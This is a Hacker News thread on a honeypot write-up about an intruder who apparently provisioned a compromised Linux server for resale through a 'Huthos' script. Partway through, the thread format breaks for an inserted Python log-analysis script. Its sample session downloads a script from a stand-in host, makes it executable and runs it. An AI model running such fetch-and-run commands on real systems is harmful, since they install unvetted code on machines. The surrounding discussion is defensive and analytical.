
Hacker tries to compromise and resell an internet-facing Linux server - zdw
http://morris.guru/huthos-the-totally-100-legit-vps-provider/
======
JosephRedfern
Not to say that Huthos are innocent, but I don't see any concrete proof that
they are behind this attack. The fact that they are hosting a server
provisioning script is hardly crazy, given that they are a hosting provider.
What's to say that the ACTUAL attacker didn't just come across the
provisioning script and decide to use it for themselves? The script URL is
listed publicly online:
[http://yandicunk.blogspot.co.uk/2015/03/cara-setting-dan-ins...](http://yandicunk.blogspot.co.uk/2015/03/cara-setting-dan-instal-vps-centos-6-32.html)
&
[http://huthos.com/tutorial/autoscripthuthos.html](http://huthos.com/tutorial/autoscripthuthos.html)

"It also appears that the hackers attack machine may be hosting an
unauthenticated web proxy" makes it sound like the attacker owns the machine
they were connecting from. IMO, chances are that "49.213.23.171" is just
another compromised box.

~~~
andrewballs
Hi, thanks for your comment. It wasn't really my objective to find the smoking
gun and bring Huthos' operation crumbling to the ground. Like you, I don't
definitively know that the operators of the website are the same people that
broke into my honeypot without permission. It seems more likely than another
totally-unrelated bad guy knowing where the file paths are to the Huthos
provisioning scripts when directory listing isn't enabled, as well as other
small nuances that I gathered while investigating this attack (the operators
of the website posting videos of them exploiting Shellshock on their youtube
channel, etc).

~~~
JosephRedfern
Agreed - after doing a little more digging myself, it does seem likely that
they are selling access to hacked machines - however, I'm sure there are other
cases of attackers using legitimate scripts to provision their servers!

Also - has anyone seen how cheaply access is being sold for!? It's pennies!

~~~
pavel_lishin
Legitimate scripts that take a screenshot of your desktop every time you run
bash?

~~~
JosephRedfern
I agree - if that's what the script was doing, then it would be dodgy. But
that's not what the script does. `screenfetch` prints out system info in a
pretty, ASCII-arty way, like this:
[http://i.imgur.com/TgaPHqa.png](http://i.imgur.com/TgaPHqa.png)

    echo "screenfetch" >> .bashrc

just causes system info to be printed to the screen with every new bash
session.

~~~
pavel_lishin
Oh, derp, I completely misread the github repo. :/

------
dmlorenzetti
All of this is outside my experience, so I have to ask - how does the attack,
as described, prove HutHos is the perpetrator?

The poster was able to find the HutHos site owner's full information "in a few
minutes", due to "poor operational security practices." Doesn't this raise the
possibility that the HutHos server was compromised by the malware's true
owner?

~~~
fragsworth
It's because the script appears to be taking control of servers for hosting
purposes.

In other words, the simplest explanation is that Huthos is taking control of
machines so that they can sell them to customers as their own VPS service.

~~~
JosephRedfern
A VPS provider having a server provisioning script available doesn't seem to
be such a crazy thing to me - it still doesn't prove that Huthos are behind
the attacks.

~~~
blueskin_
On their public site? It's also written in such an amateurish style anyway...

------
dynsrv
Yes, you can contact Indonesian CERT. Good news, we have more than one :)

- [http://www.idsirtii.or.id/halaman/tentang/kontak-kami.html](http://www.idsirtii.or.id/halaman/tentang/kontak-kami.html)
- [http://www.cert.or.id/kontak/en/](http://www.cert.or.id/kontak/en/)

------
dankohn1
This was amusing. I like imagining new attackers taking over the infected
machines and running their own VPS service on top of the hacked VPS accounts.
You could have poorly secured turtles all the way down.

------
kordless
There are three 'knobs' to the cloud today: compute, storage and networking. A
new emergent 'knob' for the cloud is trust. Trust affects three primary
features of the cloud: how it's paid for (credit vs. capital expenditure), how
it works (standards vs. custom solutions) and who I am (identity management
vs. anonymous use). I won't go into it much here, but cryptocurrencies play a
part in this knob, big time.

In Huthos' case, they 'hack' the credit part by simply taking a machine with
poor identity management in place (honeypot) and then providing a high level of
anonymization for their customers (the 'who I am' above), and providing it as a
standard way for extending a VPS offering (which itself provides 'who I am'
services).

It's all about trust, and the most irritating part about it is that they
violate it first before they get to selling it to others. Crazy.

------
Gigablah
Looks like the owner of Huthos doesn't even bother hiding the nature of his
operations. The author mentions he has "poor operational security practices"
which is rather charitable given that the "buy a vps" links on the website
simply link directly to his Facebook profile.

~~~
MichaelGG
Or maybe Huthos was hacked and being used to host these scripts.

I'd want a bit more proof, like it actually being used by a Huthos customer,
before going after them.

~~~
Gigablah
The domain name could have been hijacked, yes. The whole sales page and the
"Vision Phreak" setup seems like a one-man operation so far though. (E.g. the
Facebook group has over 10k members but it seems like the owner just added
them all by himself.) And their Google+ profile is all about "phreaking" and
posts from wannabe hackers.

So yeah, not sure about Huthos but Vision Phreak is definitely shady.

------
BorisMelnik
Absolutely fascinating. I've been "in and around" the security community (not
a part of) for years now, and never heard of a company offering a service like
this.

I love how he gives advice to the company at the end. I mean c'mon, you get
root access via dictionary attack within a quick timeframe and you don't think
it is a honeypot?

~~~
ryanlol
I rather doubt they actually care if the target server is a honeypot or not,
it looks like they're just looking for free hosting.

~~~
BorisMelnik
If that honeypot is a blogging security activist that is going to out them,
they might care.

~~~
ryanlol
If they didn't want to get outed they would probably be trying to conceal
themselves in the first place. Often there's no need for that.

------
rohan404
Guess the intruder wasn't completely convinced that chmod works the first time
around

~~~
jpmattia
Yeah, that was weird. Any ideas why the multiple executions occurred?

~~~
blueskin_
He wanted to make sure it was _really_ chmoded.

------
tomglindmeier
I wonder if Huthos is offering an SLA for their VPS :)

------
pavel_lishin
That provisioning script seems to install a screenshot utility that fires at
every login. That definitely doesn't seem like a standard feature for a
hosting provider to offer.

~~~
pavel_lishin
Ack, I completely misunderstood what screenfetch does. Disregard above
comment.

------
chambo622
On another note, how many times does one need to chmod a file?

~~~
tankenmate
What I suspect you can't see is an attempt to use TAB to autocomplete the
execution of the local script; when it fails the script kiddie tries to +x the
script again. I suspect you'll also find that the script doesn't execute
because bash isn't installed; only dash and/or busybox.
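As an added, defender-side illustration of the session pattern tankenmate describes (this is not code from the linked article or from any commenter), the script below parses a constructed honeypot command log and flags the drop-and-run pattern: a file is downloaded, chmod'd one or more times, then executed. The one-command-per-line `CMD: ...` log format and the sample session are assumptions made for the example.

```python
"""Flag provisioning-style command sequences in a honeypot shell session.

Added example, not from the linked article or the thread. The log format
(one "CMD: <command>" line per executed command) and the sample session
below are constructed for illustration.
"""
import re
from collections import Counter

# Constructed sample session, loosely modelled on the behaviour discussed
# in the thread: fetch a script, chmod it several times, try to run it.
SAMPLE_SESSION = """\
CMD: uname -a
CMD: wget http://example.invalid/autoscript.sh
CMD: chmod +x autoscript.sh
CMD: chmod +x autoscript.sh
CMD: chmod 777 autoscript.sh
CMD: ./autoscript.sh
CMD: sh autoscript.sh
""".splitlines()

# A benign-looking session used as a control case.
BENIGN_SESSION = """\
CMD: uname -a
CMD: ls -la
CMD: cat /etc/os-release
""".splitlines()

DOWNLOAD_RE = re.compile(r"^(wget|curl)\b")
CHMOD_RE = re.compile(r"^chmod\s+\S+\s+(\S+)")
EXEC_RE = re.compile(r"^(?:\./|sh\s+|bash\s+)(\S+)")


def parse_commands(lines):
    """Return the command strings from 'CMD: ...' log lines, ignoring others."""
    prefix = "CMD: "
    return [line[len(prefix):].strip() for line in lines if line.startswith(prefix)]


def analyse_session(lines):
    """Summarise a session: downloads, files chmod'd more than once,
    and files that were downloaded, chmod'd and then executed."""
    cmds = parse_commands(lines)

    downloads = [c for c in cmds if DOWNLOAD_RE.match(c)]
    # Last path component of the URL is the name the file lands under.
    downloaded_names = {d.split()[-1].rsplit("/", 1)[-1] for d in downloads}

    chmod_targets = Counter()
    for c in cmds:
        m = CHMOD_RE.match(c)
        if m:
            chmod_targets[m.group(1)] += 1

    executed = set()
    for c in cmds:
        m = EXEC_RE.match(c)
        if m:
            executed.add(m.group(1).lstrip("./"))

    return {
        "downloads": downloads,
        "repeated_chmod": {f: n for f, n in chmod_targets.items() if n > 1},
        "drop_and_run": sorted(
            f for f in executed if f in downloaded_names and f in chmod_targets
        ),
    }


if __name__ == "__main__":
    for name, session in (("sample", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        print(name, analyse_session(session))
```

Run stand-alone it prints one summary per session; in a real deployment the input would be the honeypot's own command log rather than the constructed lines above, and a non-empty `drop_and_run` list is the signal worth alerting on.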

------
mutexes
The "/script/" directory is "secured" by some shoddy "password protector"
script that points to some other... shoddy Facebook page.

Huthos could simply be an innocent clueless bystander in a larger compromise
situation.

[http://prntscr.com/6tah4b](http://prntscr.com/6tah4b)

------
Somasis
On a slightly unrelated note, I like how the author referred to the attacker
with she/her, a small detail I can appreciate since they normally refer to
them with he/him.

~~~
mhurron
Given that the attacker is unknown, the correct term would be they or them.
Gender is unknown, so a gender-neutral description should be used.

~~~
cddotdotslash
But they is plural, so wouldn't the author technically need to say "he or she"
for each occurrence? Sadly, English has no singular gender neutral pronoun.

~~~
Somasis
"They" can be used in the singular. Most people use it without thinking about
it in conversation.

~~~
monochromatic
Only people who don't mind sounding ignorant.

~~~
TheyAreFine
"...including Chaucer, Shakespeare, Jane Austen, Thackeray, and Shaw"

[https://en.wikipedia.org/wiki/Singular_they](https://en.wikipedia.org/wiki/Singular_they)

~~~
dang
Oh yeah. Also Byron ("Every body does and says what they please"), Austen
("Nobody thinks of that when they fall in love"), Thackeray ("A person can't
help their birth"), Wilde ("Experience is the name everyone gives to their
mistakes"), Shaw ("It's enough to drive anyone out of their senses"),

Lewis Carroll: "'Whoever lives there,' thought Alice, 'it'll never do to come
upon them this size: why, I should frighten them out of their wits!'"

C. S. Lewis: "She kept her head and kicked her shoes off, as everybody ought
to do who falls into deep water in their clothes."

Doris Lessing: "And how easy the way a man or woman would come in here, glance
around, find smiles and pleasant looks waiting for them, then wave and sit
down by themselves."

E.B. White: "But somebody taught you, didn't they?"

This is settled. Singular 'they' is good English and always has been. The rule
against it was just made up by 18th century grammarians (including the
fascinating Ann Fisher [4], who surely would regret it now) and they even got
a law passed in 1850 prohibiting it, which only goes to show how widely used
it was.

1. [https://web.archive.org/web/20150328135337/http://www.crossm...](https://web.archive.org/web/20150328135337/http://www.crossmyt.com/hc/linghebr/sgtheirl.html)

2. [http://itre.cis.upenn.edu/~myl/languagelog/archives/002748.h...](http://itre.cis.upenn.edu/~myl/languagelog/archives/002748.html)

3. [http://www.pemberley.com/janeinfo/austhlis.html](http://www.pemberley.com/janeinfo/austhlis.html)

4. [http://www.nytimes.com/2009/07/26/magazine/26FOB-onlanguage-...](http://www.nytimes.com/2009/07/26/magazine/26FOB-onlanguage-t.html?_r=0&gwh=CC1FD7DF9F445A743AE7FFF6E7016729&gwt=pay)

~~~
monochromatic
Hmm. Well, if Garner's[1] on board with it, I guess I can be too.

[1] [http://www.lawprose.org/blog/?p=502](http://www.lawprose.org/blog/?p=502)

------
stevenh
While interesting, I'm not sure how I feel about him ending the article with
solid advice for criminals on how to avoid getting caught.

~~~
andrewballs
I'm the author of this post. You mention a tough philosophical quandary that I
struggle with every time I share information with the rest of the world.

As much as I hate giving attackers anything, I am very dedicated to
information sharing so that people can learn as much as possible from my
posts. The truth is always out there one way or another. I would rather
everybody be as educated as possible. Hopefully that makes sense.

~~~
tomglindmeier
I couldn't agree more.

------
karangoeluw
So... the attacker accessed the server of a security consultant by
"bruteforcing a username and password combination"...

EDIT: Security newb here. It was a honeypot, aka a trap.

~~~
secure
Not “the server”, the attacker logged into a honeypot, see
[http://en.wikipedia.org/wiki/Honeypot_%28computing%29](http://en.wikipedia.org/wiki/Honeypot_%28computing%29)

